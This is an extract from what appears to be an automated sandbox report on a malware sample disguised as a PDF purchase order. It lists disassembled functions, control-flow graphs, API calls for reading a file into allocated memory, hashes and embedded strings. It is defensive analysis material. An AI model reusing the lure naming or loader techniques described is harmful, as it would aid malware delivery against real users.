                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B
                                                                                                                                                                                                                                                                                                            Function 00410130 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                            control_flow_graph 1334 410130-410142 SHGetMalloc 1335 410148-410158 SHGetDesktopFolder 1334->1335 1336 42944f-429459 call 411691 1334->1336 1337 4101d1-4101e0 1335->1337 1338 41015a-410188 call 411691 1335->1338 1337->1336 1344 4101e6-4101ee 1337->1344 1346 4101c5-4101ce 1338->1346 1347 41018a-4101a1 SHGetPathFromIDListW 1338->1347 1346->1337 1348 4101a3-4101b1 call 411691 1347->1348 1349 4101b4-4101c0 1347->1349 1348->1349 1349->1346
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                                                                                                                                                                                                                                                                                                            • API String ID: 192938534-3537542610
                                                                                                                                                                                                                                                                                                            • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6
                                                                                                                                                                                                                                                                                                            Function 00401230 Relevance: 12.1, APIs: 8, Instructions: 83windowtimeCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                            control_flow_graph 1352 401230-40123b 1353 401241-401272 call 4131f0 call 401be0 1352->1353 1354 4012c5-4012cd 1352->1354 1359 401274-401292 1353->1359 1360 4012ae-4012bf KillTimer SetTimer 1353->1360 1361 42aa61-42aa67 1359->1361 1362 401298-40129c 1359->1362 1360->1354 1365 42aa8b-42aaa7 Shell_NotifyIconW 1361->1365 1366 42aa69-42aa86 Shell_NotifyIconW 1361->1366 1363 4012a2-4012a8 1362->1363 1364 42aaac-42aab3 1362->1364 1363->1360 1367 42aaf8-42ab15 Shell_NotifyIconW 1363->1367 1368 42aad7-42aaf3 Shell_NotifyIconW 1364->1368 1369 42aab5-42aad2 Shell_NotifyIconW 1364->1369 1365->1360 1366->1360 1367->1360 1368->1360 1369->1360
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00401257
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,?), ref: 004012B0
                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1792922140-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
                                                                                                                                                                                                                                                                                                            Function 0553D5F0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                            control_flow_graph 1370 553d5f0-553d69e call 553b030 1373 553d6a5-553d6cb call 553e500 CreateFileW 1370->1373 1376 553d6d2-553d6e2 1373->1376 1377 553d6cd 1373->1377 1384 553d6e4 1376->1384 1385 553d6e9-553d703 VirtualAlloc 1376->1385 1378 553d81d-553d821 1377->1378 1379 553d863-553d866 1378->1379 1380 553d823-553d827 1378->1380 1386 553d869-553d870 1379->1386 1382 553d833-553d837 1380->1382 1383 553d829-553d82c 1380->1383 1389 553d847-553d84b 1382->1389 1390 553d839-553d843 1382->1390 1383->1382 1384->1378 1391 553d705 1385->1391 1392 553d70a-553d721 ReadFile 1385->1392 1387 553d872-553d87d 1386->1387 1388 553d8c5-553d8da 1386->1388 1393 553d881-553d88d 1387->1393 1394 553d87f 1387->1394 1395 553d8ea-553d8f2 1388->1395 1396 553d8dc-553d8e7 VirtualFree 1388->1396 1397 553d85b 1389->1397 1398 553d84d-553d857 1389->1398 1390->1389 1391->1378 1399 553d723 1392->1399 1400 553d728-553d768 VirtualAlloc 1392->1400 1403 553d8a1-553d8ad 1393->1403 1404 553d88f-553d89f 1393->1404 1394->1388 1396->1395 1397->1379 1398->1397 1399->1378 1401 553d76a 1400->1401 1402 553d76f-553d78a call 553e750 1400->1402 1401->1378 1410 553d795-553d79f 1402->1410 1407 553d8ba-553d8c0 1403->1407 1408 553d8af-553d8b8 1403->1408 1406 553d8c3 1404->1406 1406->1386 1407->1406 1408->1406 1411 553d7d2-553d7e6 call 553e560 1410->1411 1412 553d7a1-553d7d0 call 553e750 1410->1412 1418 553d7ea-553d7ee 1411->1418 1419 553d7e8 1411->1419 1412->1410 1420 553d7f0-553d7f4 CloseHandle 1418->1420 1421 553d7fa-553d7fe 1418->1421 1419->1378 1420->1421 1422 553d800-553d80b VirtualFree 1421->1422 1423 553d80e-553d817 1421->1423 1422->1423 1423->1373 1423->1378
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0553D6C1
                                                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0553D8E7
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CreateFileFreeVirtual
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 204039940-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                                                                                                                                                                                                                                                                            • Instruction ID: 756c383d595ba48c5b9c65f0c46cd10ad7d6db92ee7fa2736fef32dacb03c7e3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40A10874E00209EBDB14CFA4C895BEEFBB6BF48304F208559E519BB280D775AA45CF94
                                                                                                                                                                                                                                                                                                            Function 00414F10 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                            control_flow_graph 1424 414f10-414f2c 1425 414f4f 1424->1425 1426 414f2e-414f31 1424->1426 1427 414f51-414f55 1425->1427 1426->1425 1428 414f33-414f35 1426->1428 1429 414f37-414f46 call 417f23 1428->1429 1430 414f56-414f5b 1428->1430 1442 414f47-414f4c call 417ebb 1429->1442 1431 414f6a-414f6d 1430->1431 1432 414f5d-414f68 1430->1432 1435 414f7a-414f7c 1431->1435 1436 414f6f-414f77 call 4131f0 1431->1436 1432->1431 1434 414f8b-414f9e 1432->1434 1440 414fa0-414fa6 1434->1440 1441 414fa8 1434->1441 1435->1429 1439 414f7e-414f89 1435->1439 1436->1435 1439->1429 1439->1434 1444 414faf-414fb1 1440->1444 1441->1444 1442->1425 1446 4150a1-4150a4 1444->1446 1447 414fb7-414fbe 1444->1447 1446->1427 1449 414fc0-414fc5 1447->1449 1450 415004-415007 1447->1450 1449->1450 1451 414fc7 1449->1451 1452 415071-415072 call 41e6b1 1450->1452 1453 415009-41500d 1450->1453 1454 415102 1451->1454 1455 414fcd-414fd1 1451->1455 1461 415077-41507b 1452->1461 1457 41500f-415018 1453->1457 1458 41502e-415035 1453->1458 1464 415106-41510f 1454->1464 1459 414fd3 1455->1459 1460 414fd5-414fd8 1455->1460 1462 415023-415028 1457->1462 1463 41501a-415021 1457->1463 1465 415037 1458->1465 1466 415039-41503c 1458->1466 1459->1460 1469 4150a9-4150af 1460->1469 1470 414fde-414fff call 41ee9b 1460->1470 1461->1464 1471 415081-415085 1461->1471 1472 41502a-41502c 1462->1472 1463->1472 1464->1427 1465->1466 1467 415042-41504e call 41453a call 41ed9e 1466->1467 1468 4150d5-4150d9 1466->1468 1492 415053-415058 1467->1492 1475 4150eb-4150fd call 417f23 1468->1475 1476 4150db-4150e8 call 4131f0 1468->1476 1478 4150b1-4150bd call 4131f0 1469->1478 1479 4150c0-4150d0 call 417f23 1469->1479 1486 415099-41509b 1470->1486 1471->1468 1477 415087-415096 1471->1477 1472->1466 1475->1442 1476->1475 1477->1486 1478->1479 1479->1442 1486->1446 1486->1447 1493 415114-415118 1492->1493 1494 41505e-415061 1492->1494 1493->1464 1494->1454 1495 415067-41506f 1494->1495 1495->1486
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3886058894-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                                                                                                                                                                                                            • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99
                                                                                                                                                                                                                                                                                                            Function 004103E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                            control_flow_graph 1496 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                                                                                                                                                                                            • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
                                                                                                                                                                                                                                                                                                            Function 0553D3E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                            control_flow_graph 1497 553d3e0-553d4e5 call 553b030 call 553d2d0 CreateFileW 1504 553d4e7 1497->1504 1505 553d4ec-553d4fc 1497->1505 1506 553d59c-553d5a1 1504->1506 1508 553d503-553d51d VirtualAlloc 1505->1508 1509 553d4fe 1505->1509 1510 553d521-553d538 ReadFile 1508->1510 1511 553d51f 1508->1511 1509->1506 1512 553d53a 1510->1512 1513 553d53c-553d576 call 553d310 call 553c2d0 1510->1513 1511->1506 1512->1506 1518 553d592-553d59a ExitProcess 1513->1518 1519 553d578-553d58d call 553d360 1513->1519 1518->1506 1519->1518
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0553D2D0: Sleep.KERNELBASE(000001F4), ref: 0553D2E1
                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0553D4DB
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CreateFileSleep
                                                                                                                                                                                                                                                                                                            • String ID: YU5WTYH0ADM
                                                                                                                                                                                                                                                                                                            • API String ID: 2694422964-2241810282
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4ec3ee32b0af857ee5d1071e7b73bfe09baff6b11c1a36a0a1ffc8c7d6880dc7
                                                                                                                                                                                                                                                                                                            • Instruction ID: de37749d4bfb594255f61b87b06a4a170163cc5e10d93ec3c4e3111d9fdebded
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ec3ee32b0af857ee5d1071e7b73bfe09baff6b11c1a36a0a1ffc8c7d6880dc7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52516C31E04249EAEF10DBE4C819BEFBB79AF48304F004599E619BB2C0DA755B44CBA5
                                                                                                                                                                                                                                                                                                            Function 00413A88 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                            control_flow_graph 1521 413a88-413a99 call 41718c 1524 413b10-413b15 call 4171d1 1521->1524 1525 413a9b-413aa2 1521->1525 1526 413aa4-413abc call 418407 call 419f6d 1525->1526 1527 413ae7 1525->1527 1539 413ac7-413ad7 call 413ade 1526->1539 1540 413abe-413ac6 call 419f9d 1526->1540 1529 413ae8-413af8 RtlFreeHeap 1527->1529 1529->1524 1532 413afa-413b0f call 417f23 GetLastError call 417ee1 1529->1532 1532->1524 1539->1524 1546 413ad9-413adc 1539->1546 1540->1539 1546->1529
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • __lock.LIBCMT ref: 00413AA6
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                                                                                                                                                                                                                                            • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                                                                                                                                                                                                                            • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2714421763-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                                                                                                                                                                                                            • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                                                                                                                                                                                                                                                            Function 0040F5E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                            control_flow_graph 1547 40f5e0-40f62f call 40f580 call 413990 call 4112ef call 40f6a0 call 40f6d0 1558 40f631-40f653 1547->1558 1558->1558 1559 40f655-40f66d call 414e06 1558->1559 1562 40f673-40f67b call 40f450 1559->1562 1563 42b2ee 1559->1563 1566 42b2f8-42b322 call 4151b0 call 44afdc 1562->1566 1567 40f681-40f695 call 414e94 1562->1567 1563->1566 1574 42b324-42b330 1566->1574 1574->1574 1575 42b332-42b338 call 415484 1574->1575 1577 42b33d-42b343 1575->1577
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                                                                                                                                                                                                                                                            • _strcat.LIBCMT ref: 0040F603
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
